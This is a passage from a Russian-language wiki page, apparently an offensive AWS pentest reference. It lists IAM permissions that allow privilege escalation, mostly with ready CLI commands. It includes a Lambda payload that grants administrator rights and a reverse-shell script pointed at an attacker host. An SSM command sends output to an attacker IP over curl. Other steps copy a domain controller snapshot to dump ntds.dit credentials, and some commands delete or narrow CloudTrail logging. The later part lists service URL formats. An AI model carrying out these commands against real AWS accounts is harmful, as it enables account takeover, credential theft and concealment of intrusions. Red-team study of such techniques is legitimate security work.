Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== ECS (Elastic Container Service) ==

Сервис координирования контейнеров - развертывание, администрирование, масштабирование.

=== Статьи ===

[https://rhinosecuritylabs.com/aws/weaponizing-ecs-task-definitions-steal-credentials-running-containers/ RhinoSecurity ECR/ECS]

[https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/ RhinoSecurity ECS]

=== Утилиты ===

https://github.com/RhinoSecurityLabs/ccat

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[[File:A2i.png|1000px]]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

Автоматизируйте проверку кода и оптимизируйте производительность приложений с помощью рекомендаций на базе машинного обучения

[[File:Aws codeguru.png| 1000px]]

https://aws.amazon.com/ru/codeguru/

Разделяется на следующие части:

- Reviewer - выявляет критические проблемы, уязвимости системы безопасности и трудноуловимые ошибки + дает рекомендации (языки Java и Python) - статикой.

- Profiler - выявление самых дорогостоящих строк, повышение производительности и тд засчет запуска в среде выполнения. Важно особенно для тех, кто платит за время работы скриптов.

Также на странице есть упоминание про их игру - BugBust

https://us-east-1.console.aws.amazon.com/codeguru/bugbust/participant#/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

Сервис по извлечению ценной информации из текста и работе с ним.

[[File:Aws comprehend.png|1000px]]

Список категорий, на которые может разбить текст, есть на фото выше.

Для пользовательских настроек есть несколько параметров:

- Кастомные классификации

- Кастомные определения вставок в тексте

- Endpoints - для real-time работы. !!! Достаточно дорогой сервис. В месяц берет 1400$ при минимальной сборке, поэтому если злоумышленник сможет запускать в нем Endpoint'ы в большом количестве, то компания обанкротится.

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

Собирает метрики из различных сервисов и детектит различные аномалии. Проще говоря, делает статистику по метрикам и с машинным обучением находит ошибки.

Источники метрик:

* CloudWatch

* AWS Config

* CloudTrail

* X-Ray

Если рассуждать со стороны злоумышленника, то если у него есть доступ к DevOps Guru, то у него также есть AIM-роль "Amazon DevOps Guru_Role" и привилегии на доступ к следующим ресурсам:

* Amazon CloudWatch

* Amazon CloudWatch Events

* Amazon CloudWatch Logs

* AWS CodeDeploy

* AWS CodePipeline

* AWS CloudFormation

* AWS CloudTrail

* AWS Systems Manager

* AWS X-Ray

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

Служба прогнозирования временных рядов используя машинное обучение (предсказывание последующих событий).

https://aws.amazon.com/ru/forecast/

При настройке можно выбрать один из forecasting-доменов:

* Retail

* Custom

* Inventory planning

* EC2 capacity

* Work force

* Web traffic

* Metrics

Формально это шаблоны для быстрой настройки сервиса.

Если у атакующего есть привилегии данного сервиса, то можно предположить, что он тоже может получать те же данные (например, количество трафика), что и сам сервис

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

"Разработка и развертывание моделей выявления мошенничества используя машинное обучение"

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

